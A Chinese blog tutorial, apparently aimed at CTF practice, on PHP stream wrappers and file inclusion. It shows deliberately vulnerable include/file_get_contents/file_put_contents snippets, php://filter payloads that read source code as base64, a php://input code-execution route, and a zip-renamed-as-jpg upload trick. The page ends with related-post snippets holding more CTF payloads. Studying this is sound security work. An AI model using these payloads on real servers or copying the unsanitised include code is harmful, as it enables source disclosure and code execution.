php伪协议漏洞_文件包含漏洞与PHP伪协议

最新推荐文章于 2024-04-08 15:00:31 发布
最新推荐文章于 2024-04-08 15:00:31 发布
阅读量264 收藏
点赞数 1
文章标签: php伪协议漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35262577/article/details/113020671
版权
本文详细介绍了PHP中的伪协议,如file://、php://等,以及它们在CTF(Capture The Flag)挑战中的应用。重点讲解了如何利用这些协议进行文件访问、代码执行,同时讨论了相关配置如allow_url_fopen和allow_url_include对安全的影响,并给出了若干示例payload,揭示了PHP伪协议可能带来的安全风险。
摘要由CSDN通过智能技术生成

PHP中支持的伪协议

file:// — 访问本地文件系统

http:// — 访问 HTTP(s) 网址

ftp:// — 访问 FTP(s) URLs

php:// — 访问各个输入/输出流(I/O streams)

zlib:// — 压缩流

data:// — 数据(RFC 2397)

glob:// — 查找匹配的文件路径模式

phar:// — PHP 归档

ssh2:// — Secure Shell 2

rar:// — RAR

ogg:// — 音频流

expect:// — 处理交互式的流

file://协议

PHP.ini:

file:// 协议在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

file:// 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响

filebh.php

if(isset($_GET['page']))

{

include $_GET['page'];

}

?>

file:// [文件的绝对路径和文件名]

php://协议

php://filter在双off的情况下也可以正常使用;

条件:

不需要开启allow_url_fopen,仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。

php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。

resource= 这个参数是必须的。它指定了你要筛选过滤的数据流。

read= 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。

write= 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。

任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

可以运用多种过滤器(字符串/转换/压缩/加密)

例如平时我们用来任意文件读取的payload

php://filter/read=convert.base64-encode/resource=upload.php

这里读的过滤器为convert.base64-encode,就和字面上的意思一样,把输入流base64-encode。 resource=upload.php,代表读取upload.php的内容

这样就可以以base64编码的方式读取文件源代码

e1d02aefe7dc047b80e302b86cc5e443.png

过滤器

过滤器有很多种,有字符串过滤器、转换过滤器、压缩过滤器、加密过滤器

string.rot13

进行rot13转换

string.toupper

将字符全部大写

string.tolower

将字符全部小写

string.strip_tags

去除空字符、HTML 和 PHP 标记后的结果。

功能类似于strip_tags()函数,若不想某些字符不被消除,后面跟上字符,可利用字符串或是数组两种方式

举例

$fp = fopen('php://output', 'w');

stream_filter_append($fp, 'string.rot13');

echo "rot13:";

fwrite($fp, "This is a test.\n");

fclose($fp);

echo "
";

$fp = fopen('php://output', 'w');

stream_filter_append($fp, 'string.toupper');

echo "Upper:";

fwrite($fp, "This is a test.\n");

fclose($fp);

echo "
";

$fp = fopen('php://output', 'w');

stream_filter_append($fp, 'string.tolower');

echo "Lower:";

fwrite($fp, "This is a test.\n");

fclose($fp);

echo "
";

$fp = fopen('php://output', 'w');

echo "Del1:";

stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE);

fwrite($fp, "This is a test.!!!!

~~~~

\n");

fclose($fp);

echo "
";

$fp = fopen('php://output', 'w');

echo "Del2:";

stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, "");

fwrite($fp, "This is a test.!!!!

~~~~

\n");

fclose($fp);

echo "
";

$fp = fopen('php://output', 'w');

stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, array('b','h1'));

echo "Del3:";

fwrite($fp, "This is a test.!!!!

~~~~

\n");

fclose($fp);

?>

实例模拟

$filename=$_GET["a"];

$data="test test";

file_put_contents($filename, $data);

?>

payload=http://127.0.0.1/xxx.php?a=php://filter/write=string.tolower/resource=test.php

可以往服务器中写入一个文件内容全为小写且文件名为test.php的文件:

f35316d97f243dea30531da51dd6ba24.png

xxx.php

$filename=$_GET["a"];

echo file_get_contents($filename);

?>

ile_get_contents()的$filename参数不仅仅为文件路径,还可以是一个URL(伪协议)。

payload=http://127.0.0.1/xxx.php?a=php://filter/convert.base64-encode/resource=test.php

test.php的内容以base64编码的方式显示出来

344ba0acc1fd8b5fe4f9cc58a9f07e2b.png

xxx.php

$filename=$_GET['a'];

$data="test test";

include("$filename");

?>

payload=http://127.0.0.1/xxx.php?a=php://filter/convert.base64-encode/resource=test.php

同样可以把test.php的内容以base64编码的方式显示出来

双引号包含的变量$filename会被当作正常变量执行,而单引号包含的变量则会被当作字符串执行。

php://input

php://input 是个可以访问请求的原始数据的只读流,可以读取到post没有解析的原始数据, 将post请求中的数据作为PHP代码执行。因为它不依赖于特定的 php.ini 指令。

注:enctype=”multipart/form-data” 的时候 php://input 是无效的。

allow_url_fopen :off/on

allow_url_include:on

xxx.php

echo file_get_contents($_GET["a"]);

?>

c1db801ddb16cf94ee80fe329b4c6cbc.png

但是当PHP代码为:

$test=$_GET['a'];

include($test);

?>

并且当远程包含打开的时候(allow_url_include=on),就可以造成任意代码执行。

zip://, bzip2://, zlib://协议

zip://, bzip2://, zlib://协议

PHP.ini:

zip://, bzip2://, zlib://协议在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

3个封装协议,都是直接打开压缩文件。

compress.zlib://file.gz - 处理的是 '.gz' 后缀的压缩包

compress.bzip2://file.bz2 - 处理的是 '.bz2' 后缀的压缩包

zip://archive.zip#dir/file.txt - 处理的是 '.zip' 后缀的压缩包里的文件

zip://, bzip2://, zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名。

zip://协议

php 版本大于等于 php5.3.0

使用方法:

zip://archive.zip#dir/file.txt

zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]**

要用绝对路径+url编码#

测试:

新建一个名为zip.txt的文件,内容为<?php phpinfo();?>,然后压缩为名为test.zip的zip文件。如果可以上传zip文件则上传zip文件,若不能则重命名为test.jpg后上传。其他几种压缩格式也可以这样操

作。

a96f0626f91fa44beb6c0b70d11a34dd.png

更名为jpg

payload:http://127.0.0.1/xxx.php?a=zip://C:\Users\liuxianglai\Desktop\test.jpg%23zip.txt

a94d1353abc0e79e03bbb5c435639116.png

小结:

b3aebc2f6c6d58afc36daf99ac77856a.png

Ray Who
关注
php伪协议 文件包含,文件包含漏洞伪协议利用)
weixin_33166692的博客
03-30 1046
实验环境1.已经配置好的WEB服务器2.文件包含页面include.php:文件包含phpinfo(); //一些伪协议的使用需要关注 allow_url_include 和 allow_url_fopen的状态include($_GET['f']);?>3.伪协议利用file伪协议,通过这个协议可以对系统中的文件进行包含,不过一定要是绝对路径1-1php伪协议,有两种类型 input 和 ...
php伪协议漏洞_include(文件包含漏洞php伪协议)
weixin_39935257的博客
01-17 1097
点击tips查看元素,也并没有有用的信息,联想到题目,include想起了文件包含漏洞。构造payload?file=/../../../../../../flag.php没有返回东西。看完wq学到了一个新姿势:php伪代码构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php使用 "php://filter...
PHP伪协议文件包含漏洞
z1moq的博客
08-26 333
文件包含漏洞 为了更好的使用代码的复用性,可以使用文件包含函数将文件包含进来,直接使用文件中的代码。但这就产生了文件包含漏洞,产生原因实在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。此时如果用户对变量可控,二服务器端卫队变量进行合理的校验或者校验被绕过,就会导致文件包含漏洞 文件包含所用的函数 函数 功能 include() 代码执行到 include() 函数时将执行文件中的 PHP代码 include_once() 当重
文件包含漏洞PHP伪协议
buffedon的博客
06-03 1132
文件包含漏洞PHP伪协议文件包含漏洞1. 原理攻击利用的原理攻击成功的条件2. 分类本地文件包含LFI的利用远程文件包含3. 文件上传漏洞防范禁止0字节在PHP中配置open_basedir尽量避免动态包含的变量allow_url_include置为off4. PHP伪协议file://http://ftp://php://php://stdin, php://stdout 和 php://stderrphp://inputphp://outputphp://fdphp://memory 和 php://
php伪协议getshell,bugku-flag在index里(本地文件包含漏洞+php伪协议的结合应用)
weixin_42134144的博客
03-20 304
首先页面点击click me之后就显示这样根据file=show.php可以想到本地文件包含漏洞所以直接 http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php可以得到从密文最后的“==”可以知道是base64密文,将密文解密之后可以得到得...
i春秋 afr1 解题过程 题解 原理 PHP伪协议 文件包含漏洞
AAAAAAAAAAAA66的博客
11-20 877
知识面决定攻击的广度,知识链决定攻击的深度。 最近尝试了一下挖洞,捣鼓了一天还是啥都没有,没有头绪后,还是去写点CTF题,扩充下知识面,2个方向算是互补吧。 工具 dirsearch(目录扫描工具) 火狐 hackbar 知识点 php://伪协议 php://伪协议PHP提供的一些输入输出流访问功能,允许访问PHP的输入输出流,标准输入输出的错误描述符,内存中,磁盘备份的临时文件流,以及可以操作其他读取和写入文件资源的过滤器。 php://filter是元封装器...
第十天文件包含漏洞 php伪协议
代码审计
03-15 4331
文件包含漏洞PHP中常见包含文件函数常见文件包含漏洞代码文件包含漏洞的危害文件包含漏洞的分类本地文件包含**1.上传图片马**2.读取网站源码以及配置文件远程文件包含 什么是文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件。而无需再次编写,这种 文件调用的过程一般被称为文件包含。 例如:include “conn.phpPHP中常见包含文件函数  include() 当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含
WEB入门——文件包含漏洞PHP伪协议
HasntStartIsOver的博客
06-04 926
在程序员开发过程中,通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需在此编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞
Web安全之PHP伪协议漏洞利用,以及伪协议漏洞防护方法_php伪协议漏洞
最新发布
m0_60732644的博客
04-08 609
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
php伪协议漏洞_文件包含漏洞+PHP伪协议
weixin_31706903的博客
01-17 411
BugkuCTF点击发现url中有 ?file=show.php 并且题目flag在index里 猜测文件包含PHP伪协议。猜测php://被过滤构造payload?file=php://filter/read=convert.base64-encode/resource=index.php用base64解码找到flagBugku-ctferror_reporting(0);if(!$_GET[...
PHP中危险的file_put_contents函数详解
10-19
file_put_contents() 函数把一个字符串写入文件中。最近发现file_put_contents函数有一直没注意到的问题,所以下面这篇文章主要给大家介绍了关于PHP中危险的file_put_contents函数的相关资料,需要的朋友可以参考借鉴,下面来一起看吧。
文件包含漏洞之3PHP伪协议实战
ISNS的博客
04-03 2297
一、通过php_filter获取flag 1.php://filter介绍 1.定义: 2.举例说明: (1)直接读取数据流: (2)采用某种方式读取数据流,如果有两种及以上的读取方式,中间用 | 管道符隔开: (3)写入数据流: 2.CTF实战 平台:BugkuCTF 题目:flag在index里 链接:http://123.206.87.240:8005/post/ 1.点进去看到UR...
【网络安全篇】php文件包含漏洞
贤鱼的博客
10-13 1681
php文件包含漏洞--思路+例题讲解
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 6772
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
PHP连接MySQL数据库时expect,expect实用示例
weixin_33380613的博客
04-01 303
1. 自动登录开发环境服务器#!/usr/bin/expectset timeout 30#获取输入的第一个参数,赋值给变量docker_whichset docker_which [lindex $argv 0]#如果docker_which无值,则默认值设置为0if {"$docker_which"==""} {set docker_which 0}#登录149spawn sudo ssh -...
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3340
渗透测试-文件包含漏洞以及php伪协议的应用
文件包含漏洞
jpygx123的博客
10-25 4065
文件包含漏洞 严格来说,文件包含漏洞是“代码注入”的一种,这种攻击其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。 常见的导致文件包含(文件读取)的函数如下: PHP: include():使用此函数,只有代码执行到此函数时才将文件包含进来,发生错误时只警告并继续执行。 require():使用此函数,只要程序执行,立即调用此函数包含文件,发生错误时,会输出错误信息并立即终...
php shell expect,shell脚本 expect 命令的使用
weixin_29806483的博客
03-09 191
expect使用expect 是个不错的命令,可以完成一系列的自动化命令操作。对每次ssh登录输入密码这么麻烦的时候使用深有体会。多数固定的命令执行,也可以通过expect来操作执行,非常的方便。如下例子,我们通过expect来完成一系列的操作有读取实时日志#!/usr/bin/expectspawn ssh troot@127.0.0.1set timeout 30expect "passwor...
php shell expect,shell中使用expect实现自动应答
weixin_35600177的博客
03-09 117
我们通过Shell可以实现简单的控制流功能,如:循环、判断等。但是对于需要交互的场合则必须通过人工来干预,有时候我们可能会需要实现和交互程序如telnet服务器等进行交互的功能。而Expect就使用来实现这种功能的工具。Expect是一个免费的编程工具语言,用来实现自动和交互式任务进行通信,而无需人的干预。// 示例:为map用户生成动态密码,用于临时登录使用$newpasswd = strtou...
PHP伪协议文件包含漏洞分析 - Zad的博客园实战
"Web 2.4 伪协议文件包含" 在网络安全领域,尤其是CTF(Capture The Flag)竞赛中,Web安全是一个重要的研究方向。本篇内容主要探讨了Web应用中的PHP文件包含漏洞以及利用BurySuite进行数据写入的方法,特别是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值